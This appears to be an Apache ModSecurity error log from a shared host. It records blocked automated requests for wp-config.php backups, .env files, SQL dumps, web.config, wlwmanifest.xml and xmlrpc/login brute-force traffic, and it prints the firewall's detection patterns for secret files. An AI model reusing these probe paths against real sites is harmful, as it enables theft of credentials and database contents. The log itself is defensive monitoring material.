[Tue May 26 14:55:59.935189 2026] [security2:error] [pid 658374:tid 658480] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "jetstarprojects.com"] [uri "/wp-config.php.backup"] [unique_id "ahVnJ51Mb7_aby-E0Kc3PQAAYmk"]
[Tue May 26 14:56:00.200302 2026] [security2:error] [pid 662057:tid 662231] [client 114.119.155.83:22307] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVnKPT3lMm9tGFVg9RROAAAATY"], referer: https://glorodavionics.com?route=product/product&path=72_25_109&product_id=98
[Tue May 26 14:56:00.210524 2026] [security2:error] [pid 658374:tid 658479] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "jetstarprojects.com"] [uri "/wp-config.php.bak"] [unique_id "ahVnKJ1Mb7_aby-E0Kc3QAAADGg"]
[Tue May 26 14:56:00.505678 2026] [security2:error] [pid 658374:tid 658382] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "jetstarprojects.com"] [uri "/wp-config.php.old"] [unique_id "ahVnKJ1Mb7_aby-E0Kc3QgAAXgc"]
[Tue May 26 14:56:00.610600 2026] [security2:error] [pid 662057:tid 662259] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnKPT3lMm9tGFVg9RRNwAAAVI"]
[Tue May 26 14:56:00.729427 2026] [security2:error] [pid 658374:tid 658488] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "jetstarprojects.com"] [uri "/wp-config.php.save"] [unique_id "ahVnKJ1Mb7_aby-E0Kc3RQAANnE"]
[Tue May 26 14:56:01.009106 2026] [security2:error] [pid 658374:tid 658383] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "jetstarprojects.com"] [uri "/wp-config.php.swp"] [unique_id "ahVnKZ1Mb7_aby-E0Kc3RgAAYAg"]
[Tue May 26 14:56:01.202736 2026] [autoindex:error] [pid 662057:tid 662229] [client 146.56.229.214:52196] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:56:01.591559 2026] [security2:error] [pid 658374:tid 658387] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "jetstarprojects.com"] [uri "/wp-config.php.txt"] [unique_id "ahVnKZ1Mb7_aby-E0Kc3VAAAVQw"]
[Tue May 26 14:56:03.784059 2026] [security2:error] [pid 662057:tid 662310] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnK_T3lMm9tGFVg9RRcwAAAYU"]
[Tue May 26 14:56:05.661427 2026] [security2:error] [pid 662057:tid 662296] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnLfT3lMm9tGFVg9RRjgAAAXc"]
[Tue May 26 14:56:07.325368 2026] [security2:error] [pid 658374:tid 658538] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnLp1Mb7_aby-E0Kc3nwAAACI"]
[Tue May 26 14:56:07.680875 2026] [security2:error] [pid 658374:tid 658425] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/web.config"] [unique_id "ahVnL51Mb7_aby-E0Kc3tAAAbDI"]
[Tue May 26 14:56:08.636432 2026] [security2:error] [pid 658374:tid 658551] [client 115.74.36.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnMJ1Mb7_aby-E0Kc3wAAAAC8"], referer: https://www.anujtradingco.com/
[Tue May 26 14:56:09.688002 2026] [security2:error] [pid 662057:tid 662259] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnMfT3lMm9tGFVg9RRrAAAAVI"]
[Tue May 26 14:56:09.762108 2026] [security2:error] [pid 658374:tid 658520] [client 115.74.36.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnMZ1Mb7_aby-E0Kc32AAAABA"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1147032&moderation-hash=2cdbc4a0d9827ef60d775d03a56a0144
[Tue May 26 14:56:10.016111 2026] [security2:error] [pid 662057:tid 662273] [client 154.161.32.97:47142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnMfT3lMm9tGFVg9RRuAAAAWA"]
[Tue May 26 14:56:10.016291 2026] [security2:error] [pid 662057:tid 662273] [client 154.161.32.97:47142] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnMfT3lMm9tGFVg9RRuAAAAWA"]
[Tue May 26 14:56:10.061095 2026] [security2:error] [pid 662057:tid 662304] [client 154.161.32.97:57074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnMfT3lMm9tGFVg9RRuQAAAX8"]
[Tue May 26 14:56:10.061270 2026] [security2:error] [pid 662057:tid 662304] [client 154.161.32.97:57074] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnMfT3lMm9tGFVg9RRuQAAAX8"]
[Tue May 26 14:56:11.939758 2026] [security2:error] [pid 658374:tid 658548] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnM51Mb7_aby-E0Kc4BwAAACw"]
[Tue May 26 14:56:14.255423 2026] [security2:error] [pid 658374:tid 658629] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnNZ1Mb7_aby-E0Kc4QQAAAH0"]
[Tue May 26 14:56:15.270958 2026] [security2:error] [pid 658374:tid 658449] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/database.sql"] [unique_id "ahVnN51Mb7_aby-E0Kc4bwAAH0o"]
[Tue May 26 14:56:15.535960 2026] [security2:error] [pid 658374:tid 658464] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/dump.sql"] [unique_id "ahVnN51Mb7_aby-E0Kc4gAAAJ1k"]
[Tue May 26 14:56:15.810164 2026] [security2:error] [pid 658374:tid 658492] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/backup.sql"] [unique_id "ahVnN51Mb7_aby-E0Kc4hQAAI3U"]
[Tue May 26 14:56:16.146717 2026] [security2:error] [pid 658374:tid 658495] [remote 45.148.10.5:5368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/db.sql"] [unique_id "ahVnOJ1Mb7_aby-E0Kc4iwAAIHg"]
[Tue May 26 14:56:16.389728 2026] [security2:error] [pid 658374:tid 658574] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnN51Mb7_aby-E0Kc4hwAAAEY"]
[Tue May 26 14:56:17.776535 2026] [security2:error] [pid 662057:tid 662108] [remote 209.42.20.53:43718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVnOfT3lMm9tGFVg9RSCQABJjI"]
[Tue May 26 14:56:18.265659 2026] [security2:error] [pid 662057:tid 662247] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnOfT3lMm9tGFVg9RSDwAAAUY"]
[Tue May 26 14:56:19.468094 2026] [security2:error] [pid 658374:tid 658529] [client 176.65.139.239:47256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.karuppuswamykovil.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVnO51Mb7_aby-E0Kc4qQAAABk"]
[Tue May 26 14:56:20.739971 2026] [security2:error] [pid 658374:tid 658523] [client 54.36.100.31:55892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVnPJ1Mb7_aby-E0Kc4ygAAABM"]
[Tue May 26 14:56:20.827696 2026] [security2:error] [pid 658374:tid 658522] [client 176.65.139.233:22930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVnPJ1Mb7_aby-E0Kc4ywAAABI"]
[Tue May 26 14:56:21.024709 2026] [security2:error] [pid 658374:tid 658579] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnPJ1Mb7_aby-E0Kc4xQAAAEs"]
[Tue May 26 14:56:21.328759 2026] [security2:error] [pid 662057:tid 662218] [client 54.36.100.31:59426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVnPfT3lMm9tGFVg9RSOgAAASk"]
[Tue May 26 14:56:21.621178 2026] [security2:error] [pid 658374:tid 658551] [client 54.36.100.31:54250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVnPZ1Mb7_aby-E0Kc43QAAAC8"]
[Tue May 26 14:56:21.879831 2026] [security2:error] [pid 658374:tid 658430] [remote 46.101.75.237:49454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVnPZ1Mb7_aby-E0Kc45AAAODc"]
[Tue May 26 14:56:21.917886 2026] [security2:error] [pid 658374:tid 658564] [client 54.36.100.31:63117] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahVnPZ1Mb7_aby-E0Kc46gAAADw"]
[Tue May 26 14:56:22.097137 2026] [security2:error] [pid 658374:tid 658486] [remote 74.7.241.58:51660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVnPp1Mb7_aby-E0Kc47gAAMW8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:56:22.216364 2026] [security2:error] [pid 662057:tid 662194] [client 54.36.100.31:59569] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVnPvT3lMm9tGFVg9RSPQAAARE"]
[Tue May 26 14:56:22.510184 2026] [security2:error] [pid 662057:tid 662264] [client 54.36.100.31:51539] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVnPvT3lMm9tGFVg9RSRAAAAVc"]
[Tue May 26 14:56:22.801457 2026] [security2:error] [pid 658374:tid 658561] [client 54.36.100.31:52697] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVnPp1Mb7_aby-E0Kc4-gAAADk"]
[Tue May 26 14:56:23.102091 2026] [security2:error] [pid 658374:tid 658586] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnPp1Mb7_aby-E0Kc49gAAAFI"]
[Tue May 26 14:56:23.102145 2026] [security2:error] [pid 658374:tid 658585] [client 54.36.100.31:51899] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVnP51Mb7_aby-E0Kc4-wAAAFE"]
[Tue May 26 14:56:23.405732 2026] [security2:error] [pid 658374:tid 658613] [client 54.36.100.31:64199] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVnP51Mb7_aby-E0Kc5CAAAAG0"]
[Tue May 26 14:56:23.497085 2026] [security2:error] [pid 658374:tid 658508] [client 154.161.32.97:57075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnP51Mb7_aby-E0Kc5CwAAAAQ"]
[Tue May 26 14:56:23.497180 2026] [security2:error] [pid 658374:tid 658508] [client 154.161.32.97:57075] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVnP51Mb7_aby-E0Kc5CwAAAAQ"]
[Tue May 26 14:56:23.695418 2026] [security2:error] [pid 658374:tid 658593] [client 85.208.96.200:23310] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-2nd/day/2023-05-03/"] [unique_id "ahVnP51Mb7_aby-E0Kc5EgAAAFk"]
[Tue May 26 14:56:23.695561 2026] [security2:error] [pid 658374:tid 658593] [client 85.208.96.200:23310] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-2nd/day/2023-05-03/"] [unique_id "ahVnP51Mb7_aby-E0Kc5EgAAAFk"]
[Tue May 26 14:56:23.700238 2026] [security2:error] [pid 658374:tid 658626] [client 54.36.100.31:64013] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ameritradeng.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVnP51Mb7_aby-E0Kc5EwAAAHo"]
[Tue May 26 14:56:23.835910 2026] [security2:error] [pid 658374:tid 658542] [client 176.65.139.232:59052] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "karuppuswamykovil.in"] [uri "/.env"] [unique_id "ahVnP51Mb7_aby-E0Kc5GgAAACY"]
[Tue May 26 14:56:25.486305 2026] [security2:error] [pid 662057:tid 662302] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnQfT3lMm9tGFVg9RSYAAAAX0"], referer: https://www.anujtradingco.com/
[Tue May 26 14:56:25.743001 2026] [security2:error] [pid 658374:tid 658525] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnQZ1Mb7_aby-E0Kc5PAAAABU"]
[Tue May 26 14:56:26.301393 2026] [security2:error] [pid 658374:tid 658581] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnQp1Mb7_aby-E0Kc5UAAAAE0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1287767&moderation-hash=26b90e105b7753911d3e7abf4af637c3
[Tue May 26 14:56:27.842158 2026] [security2:error] [pid 662057:tid 662252] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnQ_T3lMm9tGFVg9RSeAAAAUs"]
[Tue May 26 14:56:28.023606 2026] [security2:error] [pid 658374:tid 658558] [client 14.231.78.79:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnQ51Mb7_aby-E0Kc5dAAAADY"]
[Tue May 26 14:56:29.234241 2026] [security2:error] [pid 658374:tid 658616] [client 176.65.139.238:59772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "triviewsolutions.com"] [uri "/.env"] [unique_id "ahVnRZ1Mb7_aby-E0Kc5ogAAAHA"]
[Tue May 26 14:56:29.377722 2026] [security2:error] [pid 658374:tid 658527] [client 176.65.139.229:52212] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "docmanservices.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahVnRZ1Mb7_aby-E0Kc5qAAAABc"]
